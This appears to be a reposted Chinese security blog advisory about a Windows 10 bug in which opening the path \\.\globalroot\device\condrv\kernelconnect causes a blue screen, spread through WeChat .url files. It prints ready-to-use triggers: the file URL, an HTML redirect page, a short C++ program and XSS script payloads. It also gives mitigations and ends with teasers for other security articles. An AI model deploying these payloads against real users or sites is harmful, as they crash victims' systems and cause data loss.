红色警戒!Windows微信蓝屏文件刨析!

2021-01-21 19:28:24 430 收藏
分类专栏: 新增漏洞报告
原文链接:https://mp.weixin.qq.com/s/U66SldUJhqtV51WPxQMeCg
版权

样本

图片

核心代码为:file:///globalroot/device/condrv/kernelconnect

受灾画面:

图片

图片

图片

分析:

图片

.url文件

url格式的文件是一种网页文件,只要接触就会触发访问

漏洞分析见之前发的文章:

Windows10使用浏览器崩溃复现及分析

防护方法:

仅对windows10系统有效,其它系统不受影响

windows微信用户可关闭自动下载

图片

更多方式(.html .exe):

<html><head></head><body>><script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script></body></html>

// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){    WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect";    WIN32_FILE_ATTRIBUTE_DATA data;    GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);}

吾爱破解大牛分析:

https://www.52pojie.cn/thread-1354077-1-1.html

图片

其他利用方式XSS漏洞:

<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
<script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>

请做好个人防护!谨防漏洞威胁!转载请标注来自开普勒安全团队!谢谢!

转载自https://mp.weixin.qq.com/s/U66SldUJhqtV51WPxQMeCg

admin-r꯭o꯭ot꯭ 系统安全 web安全 安全架构
个人公众号:爱国小白帽
推送技术原创及好用的安全工具
因为我也是小白所以文章没啥深度,很适合小白学习,有问题可以一起探讨哦
已标记关键词 清除标记
表情包
插入表情
还能输入1000个字符
相关推荐
从CTF比赛真题中学习压缩包伪加密与图片隐写术【文中工具已打包】
03-29 3722
先讲个笑话,刚刚打完MAR DASCTF明御攻防赛,一如往常,很轻松便拿到了两个flag(签到与问卷),哈哈,一个脑细胞都不用消耗本文知识点:遇到加密压缩文件怎么办遇到图片隐写的几种验证方法十六进制数据还原文件大佬就不用看了,全是小白操作这是一道misc题,结合了压缩包伪加密与图片隐写技术,我们就以它为例学习一下这两种常见技术的解决方法就是这个压缩文件,后面带*说明需要密码,但是题中没有任何密码提示,ctf中不可能让你无脑爆破,因为时间是有限的,但也有可能是弱口令,反正无从下手先爆破一
【防守方基础】危险报文识别
03-10 5730
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有信息泄露类这种情况是最常见的,也是最难以捕获的,因为它也许不用攻击数据就能轻易获取,尤其是报错或探针页面,配置不当可能泄露很多东西别看它危害小,但往往某个不起眼的信息就可以改变战局命令执行类此类攻击多以echo、curl、wget、cd、ping、cat、ls等命令出现,还是很好辨认的在GET参数中执行命令在POST.
CTFHub技能书-Web-信息泄露类解题过程合集
03-01 678
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有目录遍历:这个没有技术含量,一层一层找就行了PHPINFO:搜索关键字ctfhub{就能看到flag了备份文件下载:网站源码:网站以提示了几种压缩文件后缀,猜测备份文件名是以www开头,尝试发现名为www.zip里面有个flag文件但点开之后发现没有这是ctf惯用套路,访问即可bak文件:题目.
【情人节警报】看我如何智斗陌陌情爱骗子
02-14 3032
1、骗子加群,主动钓鱼我在陌陌建了个东北老乡群,情人节前一天收到了这个小(da)姑(pian)凉(zi)的加群申请骗子的惯用套路,进来就问谁能帮个忙结果还真有人信,为了我的群友不被骗(当然不是和他抢),我决定一探究竟看她资料有几张照片,貌似挺正常再看动态,第一条9小时前??在别的群我看到有人发了这个我转发到群里,他也否认了在当天他还加了很多其他群,估计一样的套路2、和她周旋,套取信息聊了几句之后他就开始借钱了问了他姓名(假的)和手机号,但是没有绑定QQ和微信,所以我
HoneyDrive_3蜜罐系统的安装部署及使用指南
01-27 3224
HoneyDrive是主要的蜜罐Linux发行版。它是安装了Xubuntu Desktop 12.04.4 LTS版的虚拟设备(OVA)。它包含10多个预安装和预配置的蜜罐软件包,例如Kippo SSH蜜罐,Dionaea和Amun恶意软件蜜罐,Honeyd低交互蜜罐,Glastopf Web蜜罐和Wordpot,Conpot SCADA / ICS蜜罐,Thug和PhoneyC honeyclients等。此外,它包括许多有用的预配置脚本和实用程序,以分析,可视化和处理它可以捕获的数据,例如Kipp.
我的网安之路——2020年总结
01-09 3938
前言:转眼投入这行也算一年了,从20多年没碰过电脑的小白白,到坐拥上千粉丝的博主,我用了三个月。现在一年过去了,粉丝到了3k+,虽然不多,但是很铁,因为我的文章收藏量总是很多精彩人生从此刻开始初相识艰辛路感恩感谢写作的经验有惊喜有失落你关注公众号没 相遇即是缘,点赞加留言 初自我介绍网络昵称:admin-root博客地址:admin-root.blog.csdn.net性别:男年龄:24学历:大专公众号:爱国小白帽爱好:打各种球、下各.
30余种加密编码类型的密文特征分析(建议收藏)
11-11 7504
一、md5一般MD5值是32位由数字“0-9”和字母“a-f”所组成的字符串,如图。如果出现这个范围以外的字符说明这可能是个错误的md5值,就没必要再拿去解密了。16位值是取的是8~24位。md5的三个特征:确定性:一个原始数据的MD5值是唯一的,同一个原始数据不可能会计算出多个不同的MD5值。碰撞性:原始数据与其MD5值并不是一一对应的,有可能多个原始数据计算出来的MD5值是一样的,这就是碰撞。不可逆:也就是说如果告诉你一个MD5值,你是无法通过它还原出它的原始数据的,这不是你的技术不够牛,
网络安全相关行业必备网站(持续更新中)
10-14 4056
更新时间:2020年10月22日11:37:29更新内容:更新了码农常用工具直达目录信息收集类搜索引擎指纹识别whois查询子域名爆破端口扫描综合查询身份信息泄露查询威胁情报C段查询:[webscan.cc](https://webscan.cc)加密解密类md5base64站长工具:[tool.chinaz.com](http://tool.chinaz.com/Tools/Unicode.aspx)零宽隐写:[yuanfux.github.io](https://yuanfux.github.i.
蓝军HVV实用工具和网站总结(工具已打包)
09-20 3123
这篇文章排版不是很好建议公众号查看→点击进入很抱歉,来晚了,转眼已经第十天了,昨天得知很多单位都退(chu)场(ju)了,真是遗憾,希望剩下的单位能坚持到最后,我知道我这点东西帮不了太多忙,要想取得最后的胜利还需要各岗位人员的密切配合和技术大佬的支撑。不过这些工具和网站还是有点用的,对于监控人员来说可以起到事半功倍的效果。因为在我一晚上封了近700个IP,手脚麻木,筋都快断了的情况下悟出一个真理,工具能自动完成的东西你就别手动了,真会猝死的!!!下面讲重点,记好了。威胁情报01微步在线htt
渗透测试岗位面试题多人实战大汇总
04-16 8354
常见面试题总结1、假如给你一个网站你怎么去渗透?信息收集首先看是什么类型的网站,针对不同类型的网站有不同的信息搜集方案,如大型企业网站可以用天眼查,启信宝等查询法人股份等信息,小型网站可以查询使用了哪类建站系统 1,whois查詢,获取注册者邮箱姓名电话等。 2,查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 3,查看服务器操...
企业级内网的域控环境搭建3万字详细部署教程
03-29 4029
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理实验环境:环境搭建:模拟实验:...
企业级内网环境搭建2万字详细教程
03-25 6301
简单说明:环境需要四台虚拟机,每一台分别充当企业内不同的功能分区,在真实环境中的配置还需视情况自行更改内网搭建示意图目录指南所需设备:内网环境搭建:pfSense安装及使用说明基本安装过程主机端配置过程浏览器端安装过程测试主机之间的连通情况修改各服务器的IP配置检测网络连通情况设置dhcp为办公区分配IP更改防火墙规则只允许办公区上网设置防火墙规则允许全部机器上网设置防火墙规则使外网能访...
一个简单的bat脚本便可实现局域网所有存活IP的精准扫描
03-23 1818
此脚本的扫描可在几秒钟之内完成脚本内容无需更改,如下:@echo offFOR /L %%I in (1,1,255) do ping 192.168.1.%%I -n 1 -w 100arp -a >C:\Users\Administrator\Desktop\1.txtexit保存后双击执行就会出现1.txt文件,里面会出现所有存活主机的IP...
【专题文章导航】本篇收录了SQL注入、漏洞复现、后渗透、新增漏洞报告四个专题的所有文章
03-07 1231
SQL注入篇漏洞复现篇新增漏洞报告mysql 联合查询注入文件上传之js绕过【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告对information_schema数据库的解析文件上传之mime绕过【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告盲注iis6.0解析漏洞...
Cisco Unified套件 远程代码执行漏洞通告
04-09 10
报告编号:B6-2021-040802报告来源:360CERT报告作者:360CERT更新日期:2021-04-080x01 漏洞简述2021年04月08日,360CERT监测发现Cisco发布了Unified系列组件的风险通告,漏洞编号为CVE-2021-1362,漏洞等级:高危,漏洞评分:8.8。Cisco Unified 套件是思科统一通信解决方案中强大的呼叫处理组件。该组件的中存在一处远程代码执行漏洞,针对该漏洞利用需要攻击者拥有系统的登录凭据。对此,360CERT建议广大用户及时.
Cisco Small Business RV 路由器多个高危漏洞通告
04-09 8
报告编号:B6-2021-040801报告来源:360CERT报告作者:360CERT更新日期:2021-04-080x01 漏洞简述2021年04月08日,360CERT监测发现Cisco发布了Cisco Small Business RV Series Routers多个漏洞的风险通告,漏洞编号为CVE-2021-1472,CVE-2021-1473,漏洞等级:高危,漏洞评分:8.5。对此,360CERT建议广大用户及时将Cisco Rv VPN 路由器升级到最新版本。与此同时,请做好资.
Cisco SD-WAN vManage多个高危漏洞通告
04-09 7
报告编号:B6-2021-040803报告来源:360CERT报告作者:360CERT更新日期:2021-04-080x01 漏洞简述2021年04月08日,360CERT监测发现Cisco官方发布了SD-WAN vManage多个漏洞风险通告,此次通告的漏洞编号分别为CVE-2021-1479,CVE-2021-1137,CVE-2021-1480,其中包含1个严重漏洞,2个高危漏洞,此次通告评分:9.8。Cisco SD-WAN为思科提出的企业广域网解决方案,思科以安全能力为核心,通过W.
Linux系统下查找安装包所在目录的六种方法
04-01 33
想知道Linux系统下安装了哪些软件包,以及软件包安装在哪个目录下,可以用以下6种命令1. whichwhich命令查找出相关命令是否已经在搜索路径中,例子如下:$which gcc //显示出GNC的C编译器安装在哪个目录返回结果为:/usr/bin/gcc注意:如果which没有找到要找的命令,可以试试whereis,该命令搜索更大的范围的系统目录。有些系统上的which命令不显示用户没有执行权限的文件。例如$which ipppd/usr/bin/which :no ipppd in
VMWare vRealize SSRF、任意文件上传漏洞风险通告
03-31 74
报告编号:B6-2021-033101报告来源:360CERT报告作者:360CERT更新日期:2021-03-310x01 漏洞简述2021年03月31日,360CERT监测发现VMWare发布了VMSA-2021-0004的风险通告,漏洞编号为CVE-2021-21975,CVE-2021-21983,漏洞等级:高危,漏洞评分:8.6。VMware vRealize Operations 可在由 AI 提供支持的统一平台中针对私有云、混合云和多云环境提供自动配置 IT 运维管理套件。本.
漏洞分析 | WP Super Cache远程代码执行漏洞分析
03-31 40
0x01 WP Super Cache 介绍WP Super Cache是WordPress的一个插件,主要用来缓存加速网页数据的。笔者发现管理后台再向缓存配置文件写入数据时过滤不严谨导致可以植入恶意代码,进而导致远程代码执行。WordPress官方已经在最新版1.7.2中修复了此漏洞。受影响版本:<= 1.7.10x02 漏洞复现首先登陆管理后台,找到WP Super Cache的设置页面,通常URL为**/wp-admin/options-general.php?page=wpsupe.